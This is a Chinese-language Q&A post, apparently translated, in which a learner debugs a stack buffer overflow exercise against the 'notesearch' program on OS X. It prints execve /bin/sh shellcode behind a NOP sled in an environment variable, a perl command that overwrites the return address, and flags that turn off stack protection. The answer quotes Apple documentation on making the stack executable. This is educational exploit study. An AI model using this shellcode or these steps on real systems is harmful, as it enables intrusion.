我目前正在经历"黑客攻击;
我将外壳代码作为环境变量注入。在LLDB中,我可以看到我正在覆盖返回地址,并且EIP被设置在NOP雪橇的中间。但是,它然后抛出" exc_bad_access"和segfaults。
这是我的shellcode堆栈的一部分:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff90xffffff901xffffffc01xffffffdb1xffffffc9xffffff99xffffffb0xffffffa4xffffffcdxffffff80jvXQh//shh/binxffffff89xffffffe3Qxffffff89xffffffe2Sxffffff89xffffffe1xffffffcdxffffff80"
0xbffffcdc: "SHLVL=4"
调用lldb ./notesearch $(perl -e 'print "x5exfcxffxbf"x40')
执行缓冲区溢出,这是我们在Segfaults时得到的:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
我正在使用 gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer
要编译代码,我将使用--no-pie
和--executable-heap
选项设置的Change_mach_o_flags.py脚本使用。
i 思考问题是OSX自动将堆栈设置为不可执行。不幸的是,OSX中的GCC似乎没有-z execstack
选项。也没有execstack
实用程序。
我已经搜寻了网络,无论如何都找不到使堆栈可在我的编译代码中执行。有没有办法做到这一点,如果是的话,如何?
来自Apple开发人员文档:
有两种方法可以使堆栈和堆可执行:
将-allow_stack_execute标志传递给编译器。这使得 堆栈(不是堆)可执行。
使用mprotect系统调用进行标记 特定的内存页面为可执行文件。细节超出了范围 本文档。有关更多信息,请参见"手册"页面 mprotect。
请参阅更多:https://developer.apple.com/library/content/documentation/security/conceptual/securecodingguide/articles/bufferoverflows.html